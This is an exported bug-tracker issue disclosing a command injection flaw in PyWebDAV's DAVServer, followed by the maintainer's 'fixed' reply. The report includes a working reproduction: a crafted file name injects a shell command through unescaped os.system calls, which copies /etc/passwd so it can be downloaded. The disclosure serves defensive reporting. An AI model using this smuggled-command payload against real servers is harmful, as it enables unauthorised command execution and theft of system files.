Remote user can run any shell command through DAVServer

[GoogleCodeExporter]

To reproduce:
1. Download PyWebDAV-0.9.3 and start the server from DAVServer-folder with
for example:
PYTHONPATH=../ python server.py -D /tmp -n

2. Get cadaver-webdav client (http://www.webdav.org/cadaver/)

3. Run these commands to get /etc/passwd. Any other command can be run
instead also.

user@host:~$ touch dummy
user@host:~$ cadaver http://localhost:8008/
dav:/> put dummy '\'||cp $\'\\057etc\\057passwd\'\''
Uploading dummy to `/%27%7c%7ccp%20%24%27%5c057etc%5c057passwd%27%27':
succeeded.
dav:/> cp '\'||cp $\'\\057etc\\057passwd\'\'' passwd
Copying `/%27%7c%7ccp%20%24%27%5c057etc%5c057passwd%27%27' to `/passwd': 
succeeded.
dav:/> get passwd passwd
Downloading `/passwd' to passwd:
Progress: [=============================>] 100,0% of 2176 bytes succeeded.
dav:/> 
Connection to `localhost' closed.
user@host:~$ head passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh

The reason is that fshandler.py makes extensive use of os.system and does
not escape the arguments. The shutil python module would be better suited
for the purpose.

Original issue reported on code.google.com by Petteri.Aimonen on 14 Apr 2010 at 11:52

[GoogleCodeExporter]

Fixed - thanks for the report

Original comment by spamsch@gmail.com on 15 Apr 2010 at 10:45

• Changed state: Fixed
• Added labels: Priority-Critical
• Removed labels: Priority-Medium